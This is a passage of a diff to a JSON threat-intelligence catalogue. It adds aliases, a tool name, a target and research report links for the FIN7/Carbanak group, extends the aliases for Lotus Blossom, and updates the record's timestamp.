"https://isc.sans.edu/forums/diary/More+TA551+Shathak+Word+docs+push+IcedID+Bokbot/26674", + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity", "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", "https://redcanary.com/threat-detection-report/threats/ta551/", "https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity" @@ -1153709,6 +1161289,18 @@ } ], "names": [ + "FIN7", + "Carbanak", + "Anunak", + "Coried,Coreid", + "ELBRUS ", + "Carbon Spider,CarbonSpider", + "GOLD NIAGARA", + "Sangria Tempest", + "Calcium", + "ITG14", + "G0046", + "G0008", "Anunak", "Carbanak", "Carbanak Group", @@ -1153716,6 +1161308,7 @@ "G0008" ], "external_tools": [ + "PowerSource", "Mimikatz", "MBR Eraser", "SoftPerfect Network Scanner", @@ -1153736,12 +1161329,30 @@ "country": [], "operations": [], "links": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor", + "https://blog.cyber4sight.com/2017/04/similarities-between-carbanak-and-fin7-malware-suggest-actors-are-closely-related/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf", + "https://www.rsa.com/content/dam/premium/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf", + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://securityaffairs.co/wordpress/64083/apt/fin7-new-techniques.html", + "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", + "https://blog.malwarebytes.com/threat-analysis/2019/10/the-forgotten-domain-exploring-a-link-between-magecart-group-5-and-the-carbanak-apt/", + "https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", + "https://blog.morphisec.com/the-evolution-of-the-fin7-jssloader", + "https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc", + "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/", + "https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", "http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/" ], "targets": [ + "Bank of Valetta, Malta", "Banks of Russia and payment system" ], "external_description": [], @@ -1155934,7 +1163545,7 @@ "names": [ "Lotus Blossom", "Spring Dragon", - "ST Group, Esile", + "ST Group, Esile,BitterBug", "G0030" ], "external_tools": [ @@ -1158909,5 +1166520,5 @@ ], "relationship_map": {}, "revoked": false, - "last_updated": "2023-08-03T04:50:28.409496+00:00" + "last_updated": "2023-10-01T03:05:47.061177+00:00" } \ No newline at end of file